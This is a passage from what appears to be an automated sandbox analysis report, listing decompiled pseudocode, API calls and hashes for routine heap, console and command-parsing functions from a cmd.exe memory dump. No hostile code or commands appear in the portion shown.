						return _t12;
					}
				}
			}

0x001c3b2c
0x001c3b40
0x001c3b44
0x001ce005
0x001ce008
0x001c3b4a
0x001c3b4a
0x001c3b4f
0x001c3b53
0x001cdff1
0x001cdff7
0x001cdff9
0x001cdffe
0x00000000
0x001c3b59
0x001c3b5c
0x001c3b5c
0x001c3b53

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,001C3DBB), ref: 001C3B33
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001C3DBB), ref: 001C3B3A

Part of subcall function 001C3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,001C3A9F), ref: 001C3AB2
Part of subcall function 001C3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 001C3ACD
Part of subcall function 001C3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001C3AD4
Part of subcall function 001C3AAE: memcpy.MSVCRT ref: 001C3AE3
Part of subcall function 001C3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 001C3AEC

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,001C3DBB), ref: 001CDFEA
RtlFreeHeap.NTDLL(00000000,?,001C3DBB), ref: 001CDFF1

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
String ID:
API String ID: 197374240-0
Opcode ID: b192016fccb0a3ddcd8b857a025b9ab60b9b199813fb6849d9897e1d3fe14ba5
Instruction ID: 04f20d3c2091b4a55ce91f297989aa8f6e3bc30ee0bcce873772ac29133cffbd
Opcode Fuzzy Hash: b192016fccb0a3ddcd8b857a025b9ab60b9b199813fb6849d9897e1d3fe14ba5
Instruction Fuzzy Hash: 1BE0127264821267D63437B97C0EF962A549B55B71F1140A9F785CA5C0DF60C981C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001D9897 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001D9897() {
				signed int _v8;
				void* _t4;
				int _t5;
				void* _t7;
				void* _t9;

				_t4 =  &_v8;
				__imp___get_osfhandle(_t4, _t9);
				_t5 = GetConsoleMode(_t4, 1);
				if(_t5 != 0) {
					_t7 = _v8 & 0xfffffffb;
					_v8 = _t7;
					__imp___get_osfhandle(_t7);
					return SetConsoleMode(_t7, 1);
				}
				return _t5;
			}

0x001d989d
0x001d98a3
0x001d98ab
0x001d98b3
0x001d98b8
0x001d98be
0x001d98c1
0x00000000
0x001d98c9
0x001d98d2

APIs

_get_osfhandle.MSVCRT ref: 001D98A3
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,001D3811,?,?,00000001,?), ref: 001D98AB
_get_osfhandle.MSVCRT ref: 001D98C1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001D3811,?,?,00000001,?), ref: 001D98C9

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: 0b6bb2db1abd2d25d7792293f2d63d82d8c4a71d928033279a766f769ee32608
Instruction ID: ed72bbbd7388bf3ad0df862d8e166b7e56ddf9eda3dc272dbc4341db49dc8d51
Opcode Fuzzy Hash: 0b6bb2db1abd2d25d7792293f2d63d82d8c4a71d928033279a766f769ee32608
Instruction Fuzzy Hash: CDE01AB2900609ABEB10ABB1EC0EFBA77ACEB00721F100945F915C65D1DE719A80DA60

Uniqueness

Uniqueness Score: -1.00%

Function 001C4C00 Relevance: 6.0, APIs: 4, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001C4C00() {
				void* _t1;
				void* _t2;
				intOrPtr _t4;

				_t4 =  *0x1e387c;
				_t1 =  *0x1e3878;
				 *0x1e3880 = _t4;
				 *0x1e3884 = _t1;
				__imp___get_osfhandle(_t4);
				_t2 = SetConsoleMode(_t1, 1);
				__imp___get_osfhandle( *0x1e3884);
				return SetConsoleMode(_t2, 0);
			}

0x001c4c00
0x001c4c06
0x001c4c0e
0x001c4c14
0x001c4c19
0x001c4c21
0x001c4c2f
0x001c4c3d

APIs

_get_osfhandle.MSVCRT ref: 001C4C19
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C4C21
_get_osfhandle.MSVCRT ref: 001C4C2F
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C4C37

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: 7472000d7e93964533f4f701cc6ad7b0df73ea6be02f597ab5a5a283772ddbe8
Instruction ID: 9c3999e927e56282ff744d5f12ddabfe6af1b814bc172042c7635f50312f77f8
Opcode Fuzzy Hash: 7472000d7e93964533f4f701cc6ad7b0df73ea6be02f597ab5a5a283772ddbe8
Instruction Fuzzy Hash: 96E092B2500680ABDB08ABE0FC8DF68BBA9F708301B001A09F1218B9A1DB7195C0DB10

Uniqueness

Uniqueness Score: -1.00%

Function 001BACD5 Relevance: 6.0, APIs: 4, Instructions: 15
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BACD5(void** __ecx) {
				void* _t6;

				_t6 = __ecx;
				RtlFreeHeap(GetProcessHeap(), 0,  *__ecx);
				return RtlFreeHeap(GetProcessHeap(), 0, _t6);
			}

0x001bacd8
0x001bace5
0x001bacfc

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,001BACAB), ref: 001BACDE
RtlFreeHeap.NTDLL(00000000), ref: 001BACE5
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 001BACEE
RtlFreeHeap.NTDLL(00000000), ref: 001BACF5

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 706b453f475ae2a831c342f06e201bbdd85a3a2c45854ae9e9bdd3a64d32a9d0
Instruction ID: f47a1093df65899fc7fc650925a04305352702bffd87594c309eeb2d142bdcb7
Opcode Fuzzy Hash: 706b453f475ae2a831c342f06e201bbdd85a3a2c45854ae9e9bdd3a64d32a9d0
Instruction Fuzzy Hash: B0D0C972408111ABDB543BE0BC0DFE63E28EF4D332F0104A1F645824608AB088C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001B9429 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001B9429(void* __ebx, signed short* __ecx, void* __edi) {
				intOrPtr _v8;
				signed int _t19;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed int _t26;
				void* _t28;
				signed int _t34;
				signed int _t35;
				char* _t37;
				signed int _t38;
				void* _t40;
				signed int _t43;
				signed int _t45;
				signed int _t47;
				intOrPtr* _t51;
				signed int _t55;
				void* _t56;
				signed int _t61;
				signed short* _t70;
				signed int _t71;
				signed int _t76;
				signed int _t77;
				void* _t78;
				void* _t79;
				signed int _t82;
				signed int _t84;
				void* _t86;
				signed int _t87;
				signed int _t89;

				_push(__ecx);
				_t89 = __ecx;
				if(__ecx == 0) {
					L17:
					_t19 = 1;
					L12:
					return _t19;
				}
				_t20 = E001C00B0(0xffce);
				_v8 = _t20;
				if(_t20 == 0) {
					goto L17;
				}
				_push(__ebx);
				_t21 = 0x5e;
				_t22 = E001BD7D4(__ecx, _t21);
				_t45 = 0;
				if(_t22 != 0) {
					_t51 = __ecx;
					_t70 =  &(__ecx[1]);
					do {
						_t23 =  *_t51;
						_t51 = _t51 + 2;
						__eflags = _t23;
					} while (_t23 != 0);
					_t84 = E001C00B0(2 + (_t51 - _t70 >> 1) * 4);
					__eflags = _t84;
					if(_t84 == 0) {
						L51:
						_t19 = 1;
						L11:
						goto L12;
					}
					_t26 =  *__ecx & 0x0000ffff;
					_t55 = _t84;
					__eflags = _t26;
					if(_t26 == 0) {
						L28:
						_t71 = _t84;
						__eflags = 0;
						 *_t55 = 0;
						_t11 = _t71 + 2; // 0x2
						_t56 = _t11;
						do {
							_t28 =  *_t71;
							_t71 = _t71 + 2;
							__eflags = _t28 - _t45;
						} while (_t28 != _t45);
						_t89 = E001C0100(_t84, 2 + (_t71 - _t56 >> 1) * 2);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L51;
						}
						goto L3;
					}
					_t82 = _t26;
					_t47 = 0x5e;
					do {
						 *_t55 = _t82;
						_t89 = _t89 + 2;
						_t55 = _t55 + 2;
						__eflags = _t82 - _t47;
						if(_t82 == _t47) {
							 *_t55 = _t47;
							_t55 = _t55 + 2;
							__eflags = _t55;
						}
						_t43 =  *_t89 & 0x0000ffff;
						_t82 = _t43;
						__eflags = _t43;
					} while (_t43 != 0);
					_t45 = 0;
					__eflags = 0;
					goto L28;
				}
				L3:
				 *0x1dd538 = 1;
				_t86 = E001BEEF0(1, _t89,  *0x1f3cd8);
				 *0x1dd538 = _t45;
				if(_t86 == 1) {
					_t87 = E001BDF40(_t89);
					__eflags = _t87;
					if(_t87 == 0) {
						goto L51;
					}
					__imp___wcsupr(_t87);
					_t61 = L" IF";
					_t34 = _t87;
					while(1) {
						_t76 =  *_t34;
						__eflags = _t76 -  *_t61;
						if(_t76 !=  *_t61) {
							break;
						}
						__eflags = _t76;
						if(_t76 == 0) {
							L38:
							_t35 = _t45;
							L40:
							__eflags = _t35;
							if(_t35 == 0) {
								L49:
								E001BC5A2(_t61, 0x234a, 1, _t89);
								goto L51;
							}
							_t37 = L" FOR";
							while(1) {
								_t61 =  *_t87;
								__eflags = _t61 -  *_t37;
								if(_t61 !=  *_t37) {
									break;
								}
								__eflags = _t61;
								if(_t61 == 0) {
									L48:
									__eflags = _t45;
									if(_t45 != 0) {
										goto L51;
									}
									goto L49;
								}
								_t61 =  *((intOrPtr*)(_t87 + 2));
								__eflags = _t61 - _t37[2];
								if(_t61 != _t37[2]) {
									break;
								}
								_t87 = _t87 + 4;
								_t37 =  &(_t37[4]);
								__eflags = _t61;
								if(_t61 != 0) {
									continue;
								}
								goto L48;
							}
							asm("sbb ebx, ebx");
							_t45 = _t45 | 0x00000001;
							__eflags = _t45;
							goto L48;
						}
						_t77 =  *((intOrPtr*)(_t34 + 2));
						__eflags = _t77 -  *((intOrPtr*)(_t61 + 2));
						if(_t77 !=  *((intOrPtr*)(_t61 + 2))) {
							break;
						}
						_t34 = _t34 + 4;
						_t61 = _t61 + 4;
						__eflags = _t77;
						if(_t77 != 0) {
							continue;
						}
						goto L38;
					}
					asm("sbb eax, eax");
					_t35 = _t34 | 0x00000001;
					__eflags = _t35;
					goto L40;
				}
				if(_t86 == 0xffffffff) {
					_t19 = 0;
					goto L11;
				}
				if( *0x1f3cc9 == 0 ||  *((short*)( *((intOrPtr*)(_t86 + 0x38)))) != 0x3a) {
					_t78 = 0x2a;
					_t38 = E001BD7D4( *((intOrPtr*)(_t86 + 0x38)), _t78);
					__eflags = _t38;
					if(_t38 != 0) {
						L16:
						_t19 = E001C07C0(_t45, _t86);
						goto L11;
					}
					_t79 = 0x3f;
					__eflags = E001BD7D4( *((intOrPtr*)(_t86 + 0x38)), _t79);
					if(__eflags != 0) {
						goto L16;
					}
					_t91 = _v8;
					_t40 = E001C10B0(_t86, _v8, __eflags, 0x7fe7);
					__eflags = _t40 - 2;
					if(_t40 == 2) {
						goto L9;
					}
					goto L16;
				} else {
					if( *0x1f3cc4 == 0) {
						_push(_t45);
						_push(0x400023aa);
						E001BC5A2(1);
						goto L51;
					}
					_t91 = _v8;
					L9:
					_t19 = E001C2ABE(_t86, _t91, 0x7fe7, 1);
					if(_t19 == 0) {
						_t19 =  *0x1eb8b0;
					}
					goto L11;
				}
			}

0x001b942e
0x001b9430
0x001b9434
0x001b9517
0x001b9519
0x001b94d5
0x001b94d9
0x001b94d9
0x001b943f
0x001b9444
0x001b9449
0x00000000
0x00000000
0x001b944f
0x001b9453
0x001b9458
0x001b945d
0x001b9461
0x001d0975
0x001d0977
0x001d097a
0x001d097a
0x001d097d
0x001d0980
0x001d0980
0x001d0995
0x001d0997
0x001d0999
0x001d0aa4
0x001d0aa6
0x001b94d3
0x00000000
0x001b94d4
0x001d099f
0x001d09a2
0x001d09a4
0x001d09a7
0x001d09ce
0x001d09ce
0x001d09d0
0x001d09d2
0x001d09d5
0x001d09d5
0x001d09d8
0x001d09d8
0x001d09db
0x001d09de
0x001d09de
0x001d09f5
0x001d09f7
0x001d09f9
0x00000000
0x00000000
0x00000000
0x001d09ff
0x001d09ab
0x001d09ad
0x001d09ae
0x001d09ae
0x001d09b1
0x001d09b4
0x001d09b7
0x001d09ba
0x001d09bc
0x001d09bf
0x001d09bf
0x001d09bf
0x001d09c2
0x001d09c5
0x001d09c7
0x001d09c7
0x001d09cc
0x001d09cc
0x00000000
0x001d09cc
0x001b9467
0x001b9474
0x001b947e
0x001b9480
0x001b9489
0x001d0a0b
0x001d0a0d
0x001d0a0f
0x00000000
0x00000000
0x001d0a16
0x001d0a1d
0x001d0a22
0x001d0a24
0x001d0a24
0x001d0a27
0x001d0a2a
0x00000000
0x00000000
0x001d0a2c
0x001d0a2f
0x001d0a46
0x001d0a46
0x001d0a4f
0x001d0a4f
0x001d0a51
0x001d0a85
0x001d0a8d
0x00000000
0x001d0a92
0x001d0a53
0x001d0a58
0x001d0a58
0x001d0a5b
0x001d0a5e
0x00000000
0x00000000
0x001d0a60
0x001d0a63
0x001d0a81
0x001d0a81
0x001d0a83
0x00000000
0x00000000
0x00000000
0x001d0a83
0x001d0a65
0x001d0a69
0x001d0a6d
0x00000000
0x00000000
0x001d0a6f
0x001d0a72
0x001d0a75
0x001d0a78
0x00000000
0x00000000
0x00000000
0x001d0a7a
0x001d0a7c
0x001d0a7e
0x001d0a7e
0x00000000
0x001d0a7e
0x001d0a31
0x001d0a35
0x001d0a39
0x00000000
0x00000000
0x001d0a3b
0x001d0a3e
0x001d0a41
0x001d0a44
0x00000000
0x00000000
0x00000000
0x001d0a44
0x001d0a4a
0x001d0a4c
0x001d0a4c
0x00000000
0x001d0a4c
0x001b9492
0x001b951c
0x00000000
0x001b951c
0x001b949f
0x001b94df
0x001b94e0
0x001b94e5
0x001b94e7
0x001b950e
0x001b9510
0x00000000
0x001b9510
0x001b94ee
0x001b94f4
0x001b94f6
0x00000000
0x00000000
0x001b94f8
0x001b9504
0x001b9509
0x001b950c
0x00000000
0x00000000
0x00000000
0x001b94aa
0x001b94b1
0x001d0a97
0x001d0a98
0x001d0a9d
0x00000000
0x001d0aa3
0x001b94b7
0x001b94ba
0x001b94c5
0x001b94cc
0x001b94ce
0x001b94ce
0x00000000
0x001b94cc

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

Part of subcall function 001BD7D4: wcschr.MSVCRT ref: 001BD7DA

Part of subcall function 001BEEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,001BE5F6,?,00000000,00000000,00000000), ref: 001BEF39
Part of subcall function 001BEEF0: RtlFreeHeap.NTDLL(00000000,?,001BE5F6), ref: 001BEF40
Part of subcall function 001BEEF0: _setjmp3.MSVCRT ref: 001BEFA5

_wcsupr.MSVCRT ref: 001D0A16

Part of subcall function 001C2ABE: memset.MSVCRT ref: 001C2B59
Part of subcall function 001C2ABE: ??_V@YAXPAX@Z.MSVCRT ref: 001C2C13

Strings

IF, xrefs: 001D0A1D
FOR, xrefs: 001D0A53

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
String ID: FOR$ IF
API String ID: 3818062306-2924197646
Opcode ID: d03d891b00f13faf98ca01577a0d96f7bdc9118f772161136cec491eb877d064
Instruction ID: 15232cf3d87727c3df544ecc4c593f7183233b1626bf1c79939466c430b39521
Opcode Fuzzy Hash: d03d891b00f13faf98ca01577a0d96f7bdc9118f772161136cec491eb877d064
Instruction Fuzzy Hash: AD512A3570030297DB2A6B28D8517FB3292EFE8758F15406AEA068B795FF71DD82C380

Uniqueness

Uniqueness Score: -1.00%

Function 001DB2BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E001DB2BF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t68;
				signed int _t70;
				int _t73;
				signed int _t78;
				signed int _t79;
				intOrPtr _t82;
				signed int _t88;
				void* _t93;
				intOrPtr _t96;
				signed int _t99;
				signed int _t100;
				intOrPtr* _t101;
				short _t105;
				long _t108;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t128;

				_push(0x30);
				_push(0x1dc160);
				E001C7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t128 - 0x3c)) = __edx;
				 *((intOrPtr*)(_t128 - 0x24)) = __ecx;
				_t68 = E001C00B0(0x4000);
				_t93 = _t68;
				 *(_t128 - 0x40) = _t93;
				if(_t93 == 0) {
					L46:
					return E001C76BD(_t68);
				}
				_t121 = 0;
				 *((intOrPtr*)(_t128 - 4)) = 0;
				if( *((intOrPtr*)(_t128 + 0x14)) != 0) {
					L4:
					_t115 = _t121;
					 *(_t128 - 0x2c) = _t115;
					_t119 = _t121;
					 *(_t128 - 0x28) = _t119;
					_t70 = _t68 | 0xffffffff;
					__eflags = _t70;
					 *(_t128 - 0x1c) = _t70;
					 *(_t128 - 0x30) = _t70;
					 *(_t128 - 0x20) = _t121;
					 *(_t128 - 0x34) = 0x2a;
					while(1) {
						 *(_t128 - 0x38) = _t121;
						_t96 =  *((intOrPtr*)(_t128 + 8));
						__eflags = _t121 - _t96;
						if(_t121 >= _t96) {
							break;
						}
						_t108 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
						__eflags = _t108 - 0x2f;
						if(_t108 != 0x2f) {
							__eflags = _t108 - 0x22;
							if(_t108 != 0x22) {
								__eflags = _t115;
								if(_t115 != 0) {
									L17:
									_t110 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
									__eflags = _t110 - 0x3a;
									if(_t110 == 0x3a) {
										L22:
										_t35 = _t121 + 1; // 0x1
										_t70 = _t35;
										 *(_t128 - 0x1c) = _t70;
										 *(_t128 - 0x30) = _t70;
										L23:
										__eflags = 0;
										 *(_t128 - 0x20) = 0;
										L24:
										_t121 = _t121 + 1;
										continue;
									}
									__eflags = _t110 - 0x5c;
									if(_t110 == 0x5c) {
										goto L22;
									}
									__eflags = _t110 -  *(_t128 - 0x34);
									if(_t110 ==  *(_t128 - 0x34)) {
										L21:
										 *(_t128 - 0x20) = 1;
										goto L24;
									}
									__eflags = _t110 - 0x3f;
									if(_t110 != 0x3f) {
										goto L24;
									}
									goto L21;
								}
								_t88 = wcschr(L" &()[]{}^=;!%\'+,`~", _t108);
								_t115 =  *(_t128 - 0x2c);
								__eflags = _t88;
								if(_t88 == 0) {
									_t70 =  *(_t128 - 0x1c);
									goto L17;
								}
								_t25 = _t121 + 1; // 0x1
								_t119 = _t25;
								 *(_t128 - 0x28) = _t119;
								__eflags = 0;
								 *(_t128 - 0x20) = 0;
								L15:
								_t70 =  *(_t128 - 0x1c);
								goto L24;
							}
							__eflags = _t115;
							if(_t115 == 0) {
								_t119 = _t121;
								 *(_t128 - 0x28) = _t119;
							}
							__eflags = _t115;
							_t115 = 0 | _t115 == 0x00000000;
							 *(_t128 - 0x2c) = _t115;
							goto L15;
						}
						_t18 = _t121 + 1; // 0x1
						_t119 = _t18;
						 *(_t128 - 0x28) = _t119;
						goto L23;
					}
					__eflags = _t70 - 0xffffffff;
					if(_t70 == 0xffffffff) {
						L27:
						_t122 = _t119;
						 *(_t128 - 0x30) = _t119;
						L29:
						_t73 = _t96 - _t119 + _t96 - _t119;
						 *(_t128 - 0x34) = _t73;
						memcpy(_t93,  *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t73);
						_t78 =  *((intOrPtr*)(_t128 + 8)) - _t119;
						__eflags =  *(_t128 - 0x20);
						if(__eflags != 0) {
							__eflags = 0;
							 *((short*)(_t93 + _t78 * 2)) = 0;
						} else {
							_t105 = 0x2a;
							 *((short*)(_t93 + _t78 * 2)) = _t105;
							 *((short*)( *(_t128 - 0x34) + _t93 + 2)) = 0;
						}
						_t124 =  *(_t128 + 0x10);
						_t79 = E001DAEE5(_t93, __eflags, _t124, _t122 - _t119);
						 *0x1dd580 = _t79;
						_t99 = _t79;
						 *0x1dd57c = _t99;
						 *0x1dd574 = _t119;
						 *0x1dd578 = _t124;
						_t121 = 0;
						__eflags = 0;
						L33:
						if(_t79 == 0) {
							L45:
							 *((intOrPtr*)(_t128 - 4)) = 0xfffffffe;
							E001DB4D5(_t93);
							_t68 =  *0x1dd580; // 0x0
							goto L46;
						}
						if( *((intOrPtr*)(_t128 + 0xc)) == 0) {
							_t100 = _t99 - 1;
							__eflags = _t100;
							 *0x1dd57c = _t100;
							if(_t100 >= 0) {
								L40:
								_t116 =  *((intOrPtr*)( *0x1f853c + _t100 * 4));
								_t101 =  *((intOrPtr*)( *0x1f853c + _t100 * 4));
								_t125 = _t101 + 2;
								do {
									_t82 =  *_t101;
									_t101 = _t101 + 2;
								} while (_t82 !=  *((intOrPtr*)(_t128 - 4)));
								_t126 =  *((intOrPtr*)(_t128 - 0x3c));
								if((_t101 - _t125 >> 1) + _t119 < _t126) {
									__eflags = _t126 - _t119;
									E001C1040( *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t126 - _t119, _t116);
								} else {
									 *0x1dd580 = 0;
								}
								goto L45;
							}
							_t56 = _t79 - 1; // -1
							_t100 = _t56;
							L39:
							 *0x1dd57c = _t100;
							goto L40;
						}
						_t100 = _t99 + 1;
						 *0x1dd57c = _t100;
						if(_t100 < _t79) {
							goto L40;
						}
						_t100 = _t121;
						goto L39;
					}
					__eflags = _t70 - _t119;
					if(_t70 >= _t119) {
						_t122 =  *(_t128 - 0x1c);
						goto L29;
					}
					goto L27;
				}
				_t68 =  *0x1dd578; // 0x0
				if(_t68 !=  *(_t128 + 0x10)) {
					goto L4;
				}
				_t79 =  *0x1dd580; // 0x0
				_t99 =  *0x1dd57c; // 0x0
				_t119 =  *0x1dd574; // 0x0
				goto L33;
			}

0x001db2bf
0x001db2c1
0x001db2c6
0x001db2cb
0x001db2ce
0x001db2d6
0x001db2db
0x001db2dd
0x001db2e2
0x001db4ca
0x001db4cf
0x001db4cf
0x001db2e8
0x001db2ea
0x001db2f0
0x001db312
0x001db312
0x001db314
0x001db317
0x001db319
0x001db31c
0x001db31c
0x001db31f
0x001db322
0x001db325
0x001db328
0x001db32f
0x001db32f
0x001db332
0x001db335
0x001db337
0x00000000
0x00000000
0x001db340
0x001db344
0x001db347
0x001db351
0x001db354
0x001db36d
0x001db36f
0x001db399
0x001db39c
0x001db3a0
0x001db3a3
0x001db3be
0x001db3be
0x001db3be
0x001db3c1
0x001db3c4
0x001db3c7
0x001db3c7
0x001db3c9
0x001db3cc
0x001db3cc
0x00000000
0x001db3cc
0x001db3a5
0x001db3a8
0x00000000
0x00000000
0x001db3aa
0x001db3ae
0x001db3b5
0x001db3b5
0x00000000
0x001db3b5
0x001db3b0
0x001db3b3
0x00000000
0x00000000
0x00000000
0x001db3b3
0x001db377
0x001db37f
0x001db382
0x001db384
0x001db396
0x00000000
0x001db396
0x001db386
0x001db386
0x001db389
0x001db38c
0x001db38e
0x001db391
0x001db391
0x00000000
0x001db391
0x001db356
0x001db358
0x001db35a
0x001db35c
0x001db35c
0x001db361
0x001db366
0x001db368
0x00000000
0x001db368
0x001db349
0x001db349
0x001db34c
0x00000000
0x001db34c
0x001db3d2
0x001db3d5
0x001db3db
0x001db3db
0x001db3dd
0x001db3e5
0x001db3e9
0x001db3eb
0x001db3f7
0x001db402
0x001db404
0x001db408
0x001db41d
0x001db41f
0x001db40a
0x001db40c
0x001db40d
0x001db416
0x001db416
0x001db426
0x001db42c
0x001db431
0x001db436
0x001db438
0x001db43e
0x001db444
0x001db44a
0x001db44a
0x001db44c
0x001db44e
0x001db4b9
0x001db4b9
0x001db4c0
0x001db4c5
0x00000000
0x001db4c5
0x001db454
0x001db465
0x001db465
0x001db468
0x001db46e
0x001db479
0x001db47e
0x001db481
0x001db483
0x001db486
0x001db486
0x001db489
0x001db48c
0x001db499
0x001db49e
0x001db4aa
0x001db4b4
0x001db4a0
0x001db4a2
0x001db4a2
0x00000000
0x001db49e
0x001db470
0x001db470
0x001db473
0x001db473
0x00000000
0x001db473
0x001db456
0x001db457
0x001db45f
0x00000000
0x00000000
0x001db461
0x00000000
0x001db461
0x001db3d7
0x001db3d9
0x001db3e2
0x00000000
0x001db3e2
0x00000000
0x001db3d9
0x001db2f2
0x001db2fa
0x00000000
0x00000000
0x001db2fc
0x001db301
0x001db307
0x00000000

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

wcschr.MSVCRT ref: 001DB377
memcpy.MSVCRT ref: 001DB3F7

Strings

&()[]{}^=;!%'+,`~, xrefs: 001DB372

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$AllocProcessmemcpywcschr
String ID: &()[]{}^=;!%'+,`~
API String ID: 3241892172-381716982
Opcode ID: 37c80ccfaa04748e310aa3a044442423675badfc0451a1941c6e18927fc8b8ce
Instruction ID: 724a213cdd9c03bcf5e6c45174c451426fd45f43c3679643d1703fae00d0bf23
Opcode Fuzzy Hash: 37c80ccfaa04748e310aa3a044442423675badfc0451a1941c6e18927fc8b8ce
Instruction Fuzzy Hash: 8B616870E09215EBCF18CF68E8906ADB7F1BF58310B26422FE816E7751EB709941DB94

Uniqueness

Uniqueness Score: -1.00%

Function 001BDE4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E001BDE4F(void* __eax, short* __ebx, void* __ecx) {
				void* __edi;
				short _t8;
				short _t9;
				intOrPtr _t18;
				short* _t24;
				long _t29;
				void* _t32;
				void* _t37;
				void* _t41;
				short _t42;
				void* _t46;
				intOrPtr* _t47;
